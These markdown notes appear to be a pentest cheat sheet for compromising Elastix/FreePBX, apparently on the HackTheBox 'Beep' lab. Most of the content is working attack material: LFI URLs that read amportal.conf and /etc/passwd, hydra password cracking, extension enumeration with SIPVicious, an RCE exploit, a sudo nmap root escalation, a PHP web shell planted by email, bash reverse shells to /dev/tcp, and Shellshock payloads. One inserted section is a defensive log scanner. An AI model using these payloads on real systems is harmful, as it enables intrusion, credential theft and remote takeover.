# Elastix FreePBX

## Elastix LFI graph.php

* Elastix version: FreePBX 2.8.14
* google "elastix vulnerabilities"
* Elastix 2.2.0 graph.php [Local File Inclusion (LFI)](/04-webapps/lfi.md)
* <https://www.exploit-db.com/exploits/37637>
* **amportal.conf** - config file to target; it gives up the creds
* If you find a user/password, fire up [**hydra**](/05-passwords-ciphers/hydra.md) and crack it

```
searchsploit elastix
searchsploit -m 37637   ..copy LFI

https://$IP/vtigercrm/graph.php?current_language
=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
=../../../../../../../..//etc/passwd%00&module=Accounts&action

Ignore users with nologin
vim > :g/nologin/d

Fix formatting:
tr '#' '\n' < input.txt > output.txt
grep -i -E 'user|pass|host|name' output.txt

hydra -L users.txt -P pass.txt ssh://$IP

Passwords found here.. could be used as 'root' :)
(beep htb)
```

## Elastix LFI vtigercrm

* vTiger CRM 5.1.0
* gobuster found 'vtigercrm' folder
* searchsploit vtiger found: Local File Inclusion - 18770.txt

```
https://$IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php
?module_name=english.php HTTP/1.1
?module_name=../../../../../../../../etc/passwd%00
?module_name=../../../../../../../../proc/self/status%00
?module_name=../../../../../../../../var/mail/asterisk%00

View Page Source!
Found: uid:100:asterisk, passwd, mail-read
```
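
A defender-side check for the two LFI requests above, as an added example that is not part of the original notes: it scans web-server access logs for query parameters carrying a `..` path segment or a null byte, the pattern both the `current_language` and `module_name` requests rely on. The log lines are constructed samples, and the function names are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (Apache combined style), not taken from a real host.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 13779
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1965
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts&action=index HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:01:30 +0000] "GET /panel/ HTTP/1.1" 200 4096
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" \d{3}')
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')  # a ".." path segment


def decode_fully(value, max_rounds=3):
    """Undo nested percent-encoding so the checks see the normalised value."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_lfi_attempts(log_text):
    """Return (client, path, parameter, reasons) for every suspicious query parameter."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        parts = urlsplit(target)
        # parse_qsl decodes once; decode_fully handles any remaining layers.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = decode_fully(value)
            reasons = []
            if TRAVERSAL_RE.search(value):
                reasons.append("traversal")
            if "\x00" in value:
                reasons.append("null-byte")
            if reasons:
                findings.append((client, parts.path, name, reasons))
    return findings


if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit)
```
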

## PBX Extensions

* <https://$IP/panel> ..Target will show extensions (if you can access)
* **SIPVicious**: Find active 'extensions' by wardialing your PBX
* sudo apt install sipvicious
* <https://github.com/EnableSecurity/sipvicious>
* <https://helpforhac.blogspot.com/2014/01/free-pbx-hack-phone.html>

```
> svmap 10.129.113.87 -vv

+--------------------+---------------------+-------------+
| SIP Device         | User Agent          | Fingerprint |
+====================+=====================+=============+
| 10.129.113.87:5060 | FPBX-2.8.1(1.8.7.0) | disabled    |
+--------------------+---------------------+-------------+

> svwar -h
> svwar $IP
> svwar -D -m INVITE $IP
> svwar -D -m INVITE $IP -e100-300 --force

+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233       | reqauth        |
+-----------+----------------+
```

## Remote Code Execution

* FreePBX 2.8.14
* searchsploit freepbx 2.8.14
* Found: 2.10.10 / Elastix 2.2.0 - Remote Code Execution: php/webapps: 18650.py
  * Did you read the notes?
  * Elastix often allows us to run nmap with `--interactive` via sudo

```
searchsploit -m 18650
vim 18650

lhost = $MyIP
rhost = $IP
extension='1000'      ..default extension
extension='238'       ..found with svwar
url = 'https://....'
urllib.urlopen(url)   ..original
print(url)            ..to troubleshoot

nc -nvlp 4444
whoami 
asterisk

sudo nmap --interactive
nmap> !sh
id ..root
```

## Email php injection

* Requires:
  * smtp:25 open
  * user/pass of email account
  * LFI that can open/execute under same account

```
-------------
smtp:25
telnet $IP 25
EHLO mutatedknutz.beep.localdomain   ..extended hello
VRFY hacked@localhost    ..rejected
VRFY asterisk@localhost  ..connect!
mail from:hacked@hacked.com
rcpt to:asterisk@localhost
data
Subject:Testing!
Hello                                        ..test #1
<?php echo "Php success"; ?>                 ..test #2
<?php echo system($_REQUEST['command']); ?>  ..test #3

.
quit

-------------
Use LFI to pull mail/file:
https://$IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php
?module_name=../../../../../../../../var/mail/asterisk%00
&command=whoami HTTP/1.1
&command=hostname HTTP/1.1
&command=bash -i >& /dev/tcp/10.x.x.x/5151 0>&1 HTTP/1.1
Update as: URL Encoded (with burp)

nc -nvlp 5151
whoami
asterisk !!
```

## Metasploit

* Optional method: "vtiger soap upload"
* MSF SSL Issue/Fix: 6783

```
searchsploit vtigercrm
msf: vtiger_soap_upload
```

## PBX [Shellshock](/04-webapps/03-shellshock.md)

```
() { :;}; echo; /usr/bin/wget https://$IP      ..test
() { :;}; bash -i >& /dev/tcp/$IP/443 0>&1     ..reverse
```

